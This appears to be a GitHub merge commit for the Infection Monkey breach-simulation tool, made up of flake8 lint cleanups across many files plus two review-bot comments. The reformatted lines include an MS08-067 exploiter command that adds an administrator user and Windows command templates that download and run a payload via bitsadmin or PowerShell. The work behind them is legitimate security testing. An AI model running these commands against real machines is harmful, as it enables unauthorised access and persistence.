Merge pull request #636 from acepace/bugfix/random_pep

Bugfix/random pep
Thanks to @acepace
Shay Nehmad 2020-05-06 12:38:09 +03:00 committed by GitHub
commit d5021540ca
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
30 changed files with 24 additions and 49 deletions


@ -36,7 +36,7 @@ script:
## Display the linter issues
- cat flake8_warnings.txt
## Make sure that we haven't increased the amount of warnings.
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=190
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=120
- if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
## Run unit tests
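Review bot: The warning gate on the `if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]` line fails open: when the last line of flake8_warnings.txt is empty or not an integer, `[` exits with an error status, the `if` treats that as false and the build passes without any count having been checked. Lowering the limit to 120 makes this gate the thing that holds the warning count down, so it should fail closed by quoting the substitution and inverting the test: `if ! [ "$(tail -n 1 flake8_warnings.txt)" -le "$PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT" ]; then ... exit 1; fi`. How flake8_warnings.txt is produced lies outside this hunk, so whether its last line is always a bare count cannot be confirmed from here.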


@ -1,4 +1,3 @@
from datetime import timedelta
from time import sleep
import json


@ -144,4 +144,3 @@ class TestMonkeyBlackbox(object):
island_client,
"PERFORMANCE.conf",
timeout_in_seconds=10*60)


@ -57,6 +57,3 @@ class TestOSCompatibility(object):
if len(ips_that_communicated) < len(machine_list):
assert False


@ -4,7 +4,6 @@ import time
import copy
from requests import post, exceptions
from http.server import BaseHTTPRequestHandler, HTTPServer
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.exploit.HostExploiter import HostExploiter


@ -193,9 +193,9 @@ class Ms08_067_Exploiter(HostExploiter):
sock.send("cmd /c (net user {} {} /add) &&"
" (net localgroup administrators {} /add)\r\n".format(
self._config.user_to_add,
self._config.remote_user_pass,
self._config.user_to_add).encode())
self._config.user_to_add,
self._config.remote_user_pass,
self._config.user_to_add).encode())
time.sleep(2)
reply = sock.recv(1000)


@ -14,10 +14,10 @@ MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,)
GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
DROPPER_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(dropper_path)s %s' % (CMD_PREFIX, DROPPER_ARG,)
MONKEY_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(monkey_path)s %s' % (CMD_PREFIX, MONKEY_ARG,)
MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \
'/c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,)
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \
'file_path)s exit)) > NUL 2>&1 '
MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s' \
'&cmd /c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,)
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & ' \
'if not exist %(file_path)s exit)) > NUL 2>&1 '
# Commands used for downloading monkeys
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \


@ -51,18 +51,15 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
def get_routes():
raise NotImplementedError()
else:
from fcntl import ioctl
def local_ips():
valid_ips = [network['addr'] for network in get_host_subnets()]
return valid_ips
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")


@ -7,7 +7,6 @@ import sys
import infection_monkey.config
from infection_monkey.network.HostFinger import HostFinger
from infection_monkey.network.HostScanner import HostScanner
from infection_monkey.model.host import VictimHost
__author__ = 'itamar'


@ -1,5 +1,4 @@
import logging
import socket
import sys
import psutil


@ -1,3 +1 @@
from infection_monkey.transport.http import HTTPServer, LockedHTTPServer
__author__ = 'hoffer'


@ -73,7 +73,6 @@ class AutoNewWindowsUser(AutoNewUser):
def run_as(self, command):
# Importing these only on windows, as they won't exist on linux.
import win32con
import win32process
import win32api
import win32event


@ -46,4 +46,3 @@ class BootloaderHTTPRequestHandler(BaseHTTPRequestHandler):
@staticmethod
def get_bootloader_resource_url(server_ip):
return "https://" + server_ip + ":" + str(Environment._ISLAND_PORT) + "/api/bootloader/"


@ -9,7 +9,8 @@ class TestAwsEnvironment(IslandTestCase):
def test_get_auth_users(self):
env = AwsEnvironment()
# This is "injecting" the instance id to the env. This is the UTs aren't always executed on the same AWS machine
# (might not be an AWS machine at all). Perhaps it would have been more elegant to create a Mock, but not worth it for
# (might not be an AWS machine at all).
# Perhaps it would have been more elegant to create a Mock, but not worth it for
# this small test.
env._instance_id = "i-666"
hash_obj = hashlib.sha3_512()
@ -22,5 +23,3 @@ class TestAwsEnvironment(IslandTestCase):
assert auth_user.id == 1
assert auth_user.username == "monkey"
assert auth_user.secret == hash_obj.hexdigest()


@ -12,9 +12,9 @@ else:
connect(db=env.mongo_db_name, host=env.mongo_db_host, port=env.mongo_db_port)
# Order of importing matters here, for registering the embedded and referenced documents before using them.
from .config import Config
from .creds import Creds
from .monkey_ttl import MonkeyTtl
from .pba_results import PbaResults
from .command_control_channel import CommandControlChannel
from .monkey import Monkey
from .config import Config # noqa: F401
from .creds import Creds # noqa: F401
from .monkey_ttl import MonkeyTtl # noqa: F401
from .pba_results import PbaResults # noqa: F401
from .command_control_channel import CommandControlChannel # noqa: F401
from .monkey import Monkey # noqa: F401


@ -16,4 +16,3 @@ class Mitigation(EmbeddedDocument):
description = mitigation['description']
url = MitreApiInterface.get_stix2_external_reference_url(mitigation)
return Mitigation(name=name, description=description, url=url)


@ -13,8 +13,8 @@ logger = logging.getLogger(__name__)
class TestMonkey(IslandTestCase):
"""
Make sure to set server environment to `testing` in server_config.json! Otherwise this will mess up your mongo instance and
won't work.
Make sure to set server environment to `testing` in server_config.json!
Otherwise this will mess up your mongo instance and won't work.
Also, the working directory needs to be the working directory from which you usually run the island so the
server_config.json file is found and loaded.


@ -33,7 +33,8 @@ class TestFinding(IslandTestCase):
event_example = Event.create_event(
title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)
Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, events=[event_example])
Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION,
status=zero_trust_consts.STATUS_FAILED, events=[event_example])
self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 1)
self.assertEqual(len(Finding.objects(status=zero_trust_consts.STATUS_FAILED)), 1)


@ -1,7 +1,6 @@
from unittest import TestCase
from monkey_island.cc.resources.bootloader import Bootloader
from monkey_island.cc.services.utils.bootloader_config import SUPPORTED_WINDOWS_VERSIONS
class TestBootloader(TestCase):


@ -1,4 +1,3 @@
from flask import request
import flask_restful
from monkey_island.cc.auth import jwt_required


@ -120,7 +120,7 @@ class AttackConfig(object):
def set_bool_conf_val(path, val, monkey_config):
"""
Changes monkey's configuration by setting one of its boolean fields value
:param path: Path to boolean value in monkey's configuration. E.g. ['monkey', 'system_info', 'should_use_mimikatz']
:param path: Path to boolean value in monkey's configuration. ['monkey', 'system_info', 'should_use_mimikatz']
:param val: Boolean
:param monkey_config: Monkey's configuration
"""
@ -183,5 +183,5 @@ class AttackConfig(object):
techniques = {}
for type_name, attack_type in list(attack_config.items()):
for key, technique in list(attack_type['properties'].items()):
techniques[key] = {'selected': technique['value'], 'type': SCHEMA['properties'][type_name]['title']}
techniques[key] = {'selected': technique['value'], 'type': SCHEMA['properties'][type_name]['title']}
return techniques
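Review bot: The rewritten `:param path:` line in the set_bool_conf_val docstring drops the "E.g." that introduced the list, so `['monkey', 'system_info', 'should_use_mimikatz']` now reads as the definition of the parameter rather than one example of a path. To stay within the line limit without losing that, wrap the description instead of shortening it: `:param path: Path to boolean value in monkey's configuration,` followed by a continuation line `e.g. ['monkey', 'system_info', 'should_use_mimikatz']`. The function body continues outside the hunk, so how `path` is walked is not visible here.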


@ -2,7 +2,6 @@ from monkey_island.cc.services.attack.technique_reports import AttackTechnique
from monkey_island.cc.services.reporting.report import ReportService
from common.utils.attack_utils import ScanStatus
from common.data.post_breach_consts import POST_BREACH_BACKDOOR_USER, POST_BREACH_COMMUNICATE_AS_NEW_USER
from monkey_island.cc.models import Monkey
__author__ = "shreyamalviya"


@ -129,4 +129,3 @@ class AttackTechnique(object, metaclass=abc.ABCMeta):
return {'mitigations': mitigation_document.to_mongo().to_dict()['mitigations']}
else:
return {}


@ -32,4 +32,3 @@ class TestBootloaderService(TestCase):
ips = ["127.1.1.1", "127.0.0.1", "192.168.56.1"]
ips = BootloaderService.remove_local_ips(ips)
self.assertEqual(["192.168.56.1"], ips)


@ -130,7 +130,7 @@ SCHEMA = {
"title": "Collect the machine's hostname",
"attack_techniques": []
},
{
{
"type": "string",
"enum": [
PROCESS_LIST_COLLECTOR


@ -411,5 +411,6 @@ class NodeService:
def get_hostname_by_id(node_id):
return NodeService.get_node_hostname(mongo.db.monkey.find_one({'_id': node_id}, {'hostname': 1}))
class NodeCreationException(Exception):
pass


@ -101,4 +101,3 @@ def process_mimikatz_and_wmi_info(telemetry_json):
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id')
wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
wmi_handler.process_and_handle_wmi_info()


@ -9,4 +9,3 @@ SUPPORTED_WINDOWS_VERSIONS = {
"windows7_sp1": True,
"windows8_or_greater": True,
}


@ -11,5 +11,3 @@ class TestNodeGroups(TestCase):
self.assertEqual(NodeStates.get_by_keywords(['monkey', 'linux', 'running']), NodeStates.MONKEY_LINUX_RUNNING)
with self.assertRaises(NoGroupsFoundException):
NodeStates.get_by_keywords(['bogus', 'values', 'from', 'long', 'list', 'should', 'fail'])


@ -20,7 +20,6 @@ if sys.platform == "win32":
else:
import fcntl
def local_ips():
result = []
try: